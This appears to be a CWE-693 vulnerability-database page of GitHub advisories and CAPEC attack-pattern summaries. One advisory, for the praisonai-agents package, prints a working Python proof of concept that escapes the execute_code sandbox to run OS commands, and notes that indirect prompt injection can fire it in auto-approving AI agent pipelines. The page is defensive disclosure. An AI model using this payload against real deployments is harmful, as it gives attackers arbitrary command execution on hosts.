"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2016-1626.html"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2016-1627.html"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2016-1628.html"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2016-1629.html"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2016-1630.html"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2016/06/14/9"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/91225"
},
{
"type": "WEB",
"url": "http://www.splunk.com/view/SP-CAAAPSV"
},
{
"type": "WEB",
"url": "http://www.splunk.com/view/SP-CAAAPUE"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-6MGF-HGQJ-63V5
Vulnerability from github – Published: 2026-06-09 18:30 – Updated: 2026-06-09 18:30Protection mechanism failure in Windows Mark of the Web (MOTW) allows an unauthorized attacker to bypass a security feature over a network.
{
"affected": [],
"aliases": [
"CVE-2026-45595"
],
"database_specific": {
"cwe_ids": [
"CWE-693"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-09T17:17:27Z",
"severity": "MODERATE"
},
"details": "Protection mechanism failure in Windows Mark of the Web (MOTW) allows an unauthorized attacker to bypass a security feature over a network.",
"id": "GHSA-6mgf-hgqj-63v5",
"modified": "2026-06-09T18:30:51Z",
"published": "2026-06-09T18:30:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45595"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45595"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-6Q42-XCP7-QVR5
Vulnerability from github – Published: 2024-10-28 21:30 – Updated: 2026-04-02 21:31A logic issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.7.1, macOS Sequoia 15, macOS Sonoma 14.7.1. An application may be able to break out of its sandbox.
{
"affected": [],
"aliases": [
"CVE-2024-44122"
],
"database_specific": {
"cwe_ids": [
"CWE-693"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-10-28T21:15:05Z",
"severity": "HIGH"
},
"details": "A logic issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.7.1, macOS Sequoia 15, macOS Sonoma 14.7.1. An application may be able to break out of its sandbox.",
"id": "GHSA-6q42-xcp7-qvr5",
"modified": "2026-04-02T21:31:57Z",
"published": "2024-10-28T21:30:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-44122"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/121238"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/121250"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/121568"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/121570"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2024/Oct/12"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2024/Oct/13"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-6R7R-H64Q-J8PJ
Vulnerability from github – Published: 2024-06-20 21:31 – Updated: 2024-06-20 21:31Parallels Desktop Updater Protection Mechanism Failure Software Downgrade Vulnerability. This vulnerability allows local attackers to downgrade Parallels software on affected installations of Parallels Desktop. An attacker must first obtain the ability to execute low-privileged code on the target host system in order to exploit this vulnerability.
The specific flaw exists within the Updater service. The issue results from the lack of proper validation of version information before performing an update. An attacker can leverage this in conjunction with other vulnerabilities to escalate privileges and execute arbitrary code in the context of root. Was ZDI-CAN-19481.
{
"affected": [],
"aliases": [
"CVE-2024-6153"
],
"database_specific": {
"cwe_ids": [
"CWE-693"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-06-20T20:15:20Z",
"severity": "HIGH"
},
"details": "Parallels Desktop Updater Protection Mechanism Failure Software Downgrade Vulnerability. This vulnerability allows local attackers to downgrade Parallels software on affected installations of Parallels Desktop. An attacker must first obtain the ability to execute low-privileged code on the target host system in order to exploit this vulnerability.\n\nThe specific flaw exists within the Updater service. The issue results from the lack of proper validation of version information before performing an update. An attacker can leverage this in conjunction with other vulnerabilities to escalate privileges and execute arbitrary code in the context of root. Was ZDI-CAN-19481.",
"id": "GHSA-6r7r-h64q-j8pj",
"modified": "2024-06-20T21:31:45Z",
"published": "2024-06-20T21:31:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6153"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-803"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-6RR3-7XVG-5XVQ
Vulnerability from github – Published: 2026-05-06 21:31 – Updated: 2026-05-07 01:05Inappropriate implementation in Preload in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low)
{
"affected": [],
"aliases": [
"CVE-2026-8014"
],
"database_specific": {
"cwe_ids": [
"CWE-693"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-06T19:16:52Z",
"severity": "MODERATE"
},
"details": "Inappropriate implementation in Preload in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low)",
"id": "GHSA-6rr3-7xvg-5xvq",
"modified": "2026-05-07T01:05:54Z",
"published": "2026-05-06T21:31:41Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8014"
},
{
"type": "WEB",
"url": "https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html"
},
{
"type": "WEB",
"url": "https://issues.chromium.org/issues/497490364"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-6VH2-H83C-9294
Vulnerability from github – Published: 2026-04-01 23:17 – Updated: 2026-04-06 22:54Summary
execute_code() in praisonai-agents runs attacker-controlled Python inside a three-layer sandbox that can be fully bypassed by passing a str subclass with an overridden startswith() method to the _safe_getattr wrapper, achieving arbitrary OS command execution on the host.
Details
python_tools.py:20 (source) -> python_tools.py:22 (guard bypass) -> python_tools.py:161 (sink)
# source -- _safe_getattr accepts any str subclass
def _safe_getattr(obj, name, *default):
if isinstance(name, str) and name.startswith('_'): # isinstance passes for subclasses
raise AttributeError(...)
# hop -- type() is whitelisted in safe_builtins, creates str subclass without class keyword
FakeStr = type('FakeStr', (str,), {'startswith': lambda self, *a: False})
# sink -- Popen reached via __subclasses__ walk
r = Popen(['id'], stdout=PIPE, stderr=PIPE)
PoC
from praisonaiagents.tools.python_tools import execute_code
payload = """
t = type
FakeStr = t('FakeStr', (str,), {'startswith': lambda self, *a: False})
mro_attr = FakeStr(''.join(['_','_','m','r','o','_','_']))
subs_attr = FakeStr(''.join(['_','_','s','u','b','c','l','a','s','s','e','s','_','_']))
mod_attr = FakeStr(''.join(['_','_','m','o','d','u','l','e','_','_']))
name_attr = FakeStr(''.join(['_','_','n','a','m','e','_','_']))
PIPE = -1
obj_class = getattr(type(()), mro_attr)[1]
for cls in getattr(obj_class, subs_attr)():
try:
m = getattr(cls, mod_attr, '')
n = getattr(cls, name_attr, '')
if m == 'subprocess' and n == 'Popen':
r = cls(['id'], stdout=PIPE, stderr=PIPE)
out, err = r.communicate()
print('RCE:', out.decode())
break
except Exception as e:
print('ERR:', e)
"""
result = execute_code(code=payload)
print(result)
# expected output: RCE: uid=1000(narey) gid=1000(narey) groups=1000(narey)...
Impact
Any user or agent pipeline running execute_code() is exposed to full OS command execution as the process user. Deployments using bot.py, autonomy_mode.py, or bots_cli.py set PRAISONAI_AUTO_APPROVE=true by default, meaning no human confirmation is required and the tool fires silently when triggered via indirect prompt injection.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.5.89"
},
"package": {
"ecosystem": "PyPI",
"name": "praisonaiagents"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.5.90"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-34938"
],
"database_specific": {
"cwe_ids": [
"CWE-693"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-01T23:17:48Z",
"nvd_published_at": "2026-04-03T23:17:06Z",
"severity": "CRITICAL"
},
"details": "### Summary\n\n`execute_code()` in `praisonai-agents` runs attacker-controlled Python inside a three-layer sandbox that can be fully bypassed by passing a `str` subclass with an overridden `startswith()` method to the `_safe_getattr` wrapper, achieving arbitrary OS command execution on the host.\n\n### Details\n\n`python_tools.py:20` (source) -\u003e `python_tools.py:22` (guard bypass) -\u003e `python_tools.py:161` (sink)\n```python\n# source -- _safe_getattr accepts any str subclass\ndef _safe_getattr(obj, name, *default):\n if isinstance(name, str) and name.startswith(\u0027_\u0027): # isinstance passes for subclasses\n raise AttributeError(...)\n\n# hop -- type() is whitelisted in safe_builtins, creates str subclass without class keyword\nFakeStr = type(\u0027FakeStr\u0027, (str,), {\u0027startswith\u0027: lambda self, *a: False})\n\n# sink -- Popen reached via __subclasses__ walk\nr = Popen([\u0027id\u0027], stdout=PIPE, stderr=PIPE)\n```\n\n### PoC\n```python\n\nfrom praisonaiagents.tools.python_tools import execute_code\n\npayload = \"\"\"\nt = type\nFakeStr = t(\u0027FakeStr\u0027, (str,), {\u0027startswith\u0027: lambda self, *a: False})\n\nmro_attr = FakeStr(\u0027\u0027.join([\u0027_\u0027,\u0027_\u0027,\u0027m\u0027,\u0027r\u0027,\u0027o\u0027,\u0027_\u0027,\u0027_\u0027]))\nsubs_attr = FakeStr(\u0027\u0027.join([\u0027_\u0027,\u0027_\u0027,\u0027s\u0027,\u0027u\u0027,\u0027b\u0027,\u0027c\u0027,\u0027l\u0027,\u0027a\u0027,\u0027s\u0027,\u0027s\u0027,\u0027e\u0027,\u0027s\u0027,\u0027_\u0027,\u0027_\u0027]))\nmod_attr = FakeStr(\u0027\u0027.join([\u0027_\u0027,\u0027_\u0027,\u0027m\u0027,\u0027o\u0027,\u0027d\u0027,\u0027u\u0027,\u0027l\u0027,\u0027e\u0027,\u0027_\u0027,\u0027_\u0027]))\nname_attr = FakeStr(\u0027\u0027.join([\u0027_\u0027,\u0027_\u0027,\u0027n\u0027,\u0027a\u0027,\u0027m\u0027,\u0027e\u0027,\u0027_\u0027,\u0027_\u0027]))\nPIPE = -1\n\nobj_class = getattr(type(()), mro_attr)[1]\nfor cls in getattr(obj_class, subs_attr)():\n try:\n m = getattr(cls, mod_attr, \u0027\u0027)\n n = getattr(cls, name_attr, \u0027\u0027)\n if m == \u0027subprocess\u0027 and n == \u0027Popen\u0027:\n r = cls([\u0027id\u0027], stdout=PIPE, stderr=PIPE)\n out, err = r.communicate()\n print(\u0027RCE:\u0027, out.decode())\n break\n except Exception as e:\n print(\u0027ERR:\u0027, e)\n\"\"\"\n\nresult = execute_code(code=payload)\nprint(result)\n# expected output: RCE: uid=1000(narey) gid=1000(narey) groups=1000(narey)...\n```\n\n### Impact\n\nAny user or agent pipeline running `execute_code()` is exposed to full OS command execution as the process user. Deployments using `bot.py`, `autonomy_mode.py`, or `bots_cli.py` set `PRAISONAI_AUTO_APPROVE=true` by default, meaning no human confirmation is required and the tool fires silently when triggered via indirect prompt injection.",
"id": "GHSA-6vh2-h83c-9294",
"modified": "2026-04-06T22:54:12Z",
"published": "2026-04-01T23:17:48Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-6vh2-h83c-9294"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34938"
},
{
"type": "PACKAGE",
"url": "https://github.com/MervinPraison/PraisonAI"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "PraisonAI: Python Sandbox Escape via str Subclass startswith() Override in execute_code"
}
GHSA-6W32-JGXR-C8J8
Vulnerability from github – Published: 2026-07-01 00:34 – Updated: 2026-07-01 18:31Inappropriate implementation in Navigation in Google Chrome prior to 150.0.7871.47 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium)
{
"affected": [],
"aliases": [
"CVE-2026-14017"
],
"database_specific": {
"cwe_ids": [
"CWE-693"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-30T23:17:14Z",
"severity": "CRITICAL"
},
"details": "Inappropriate implementation in Navigation in Google Chrome prior to 150.0.7871.47 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium)",
"id": "GHSA-6w32-jgxr-c8j8",
"modified": "2026-07-01T18:31:35Z",
"published": "2026-07-01T00:34:08Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14017"
},
{
"type": "WEB",
"url": "https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop_0175352312.html"
},
{
"type": "WEB",
"url": "https://issues.chromium.org/issues/517241992"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
No mitigation information available for this CWE.
CAPEC-1: Accessing Functionality Not Properly Constrained by ACLs
In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.
CAPEC-107: Cross Site Tracing
Cross Site Tracing (XST) enables an adversary to steal the victim's session cookie and possibly other authentication credentials transmitted in the header of the HTTP request when the victim's browser communicates to a destination system's web server.
CAPEC-127: Directory Indexing
An adversary crafts a request to a target that results in the target listing/indexing the content of a directory as output. One common method of triggering directory contents as output is to construct a request containing a path that terminates in a directory name rather than a file name since many applications are configured to provide a list of the directory's contents when such a request is received. An adversary can use this to explore the directory tree on a target as well as learn the names of files. This can often end up revealing test files, backup files, temporary files, hidden files, configuration files, user accounts, script contents, as well as naming conventions, all of which can be used by an attacker to mount additional attacks.
CAPEC-17: Using Malicious Files
An attack of this type exploits a system's configuration that allows an adversary to either directly access an executable file, for example through shell access; or in a possible worst case allows an adversary to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.
CAPEC-20: Encryption Brute Forcing
An attacker, armed with the cipher text and the encryption algorithm used, performs an exhaustive (brute force) search on the key space to determine the key that decrypts the cipher text to obtain the plaintext.
CAPEC-22: Exploiting Trust in Client
An attack of this type exploits vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by communicating directly with the server where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.
CAPEC-237: Escaping a Sandbox by Calling Code in Another Language
The attacker may submit malicious code of another language to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox. For instance, Java code cannot perform unsafe operations, such as modifying arbitrary memory locations, due to restrictions placed on it by the Byte code Verifier and the JVM. If allowed, Java code can call directly into native C code, which may perform unsafe operations, such as call system calls and modify arbitrary memory locations on their behalf. To provide isolation, Java does not grant untrusted code with unmediated access to native C code. Instead, the sandboxed code is typically allowed to call some subset of the pre-existing native code that is part of standard libraries.
CAPEC-36: Using Unpublished Interfaces or Functionality
An adversary searches for and invokes interfaces or functionality that the target system designers did not intend to be publicly available. If interfaces fail to authenticate requests, the attacker may be able to invoke functionality they are not authorized for.
CAPEC-477: Signature Spoofing by Mixing Signed and Unsigned Content
An attacker exploits the underlying complexity of a data structure that allows for both signed and unsigned content, to cause unsigned data to be processed as though it were signed data.
CAPEC-480: Escaping Virtualization
An adversary gains access to an application, service, or device with the privileges of an authorized or privileged user by escaping the confines of a virtualized environment. The adversary is then able to access resources or execute unauthorized code within the host environment, generally with the privileges of the user running the virtualized process. Successfully executing an attack of this type is often the first step in executing more complex attacks.
CAPEC-51: Poison Web Service Registry
SOA and Web Services often use a registry to perform look up, get schema information, and metadata about services. A poisoned registry can redirect (think phishing for servers) the service requester to a malicious service provider, provide incorrect information in schema or metadata, and delete information about service provider interfaces.
CAPEC-57: Utilizing REST's Trust in the System Resource to Obtain Sensitive Data
This attack utilizes a REST(REpresentational State Transfer)-style applications' trust in the system resources and environment to obtain sensitive data once SSL is terminated.
CAPEC-59: Session Credential Falsification through Prediction
This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.
CAPEC-65: Sniff Application Code
An adversary passively sniffs network communications and captures application code bound for an authorized client. Once obtained, they can use it as-is, or through reverse-engineering glean sensitive information or exploit the trust relationship between the client and server. Such code may belong to a dynamic update to the client, a patch being applied to a client component or any such interaction where the client is authorized to communicate with the server.
CAPEC-668: Key Negotiation of Bluetooth Attack (KNOB)
An adversary can exploit a flaw in Bluetooth key negotiation allowing them to decrypt information sent between two devices communicating via Bluetooth. The adversary uses an Adversary in the Middle setup to modify packets sent between the two devices during the authentication process, specifically the entropy bits. Knowledge of the number of entropy bits will allow the attacker to easily decrypt information passing over the line of communication.
CAPEC-74: Manipulating State
The adversary modifies state information maintained by the target software or causes a state transition in hardware. If successful, the target will use this tainted state and execute in an unintended manner.
State management is an important function within a software application. User state maintained by the application can include usernames, payment information, browsing history as well as application-specific contents such as items in a shopping cart. Manipulating user state can be employed by an adversary to elevate privilege, conduct fraudulent transactions or otherwise modify the flow of the application to derive certain benefits.
If there is a hardware logic error in a finite state machine, the adversary can use this to put the system in an undefined state which could cause a denial of service or exposure of secure data.
CAPEC-87: Forceful Browsing
An attacker employs forceful browsing (direct URL entry) to access portions of a website that are otherwise unreachable. Usually, a front controller or similar design pattern is employed to protect access to portions of a web application. Forceful browsing enables an attacker to access information, perform privileged operations and otherwise reach sections of the web application that have been improperly protected.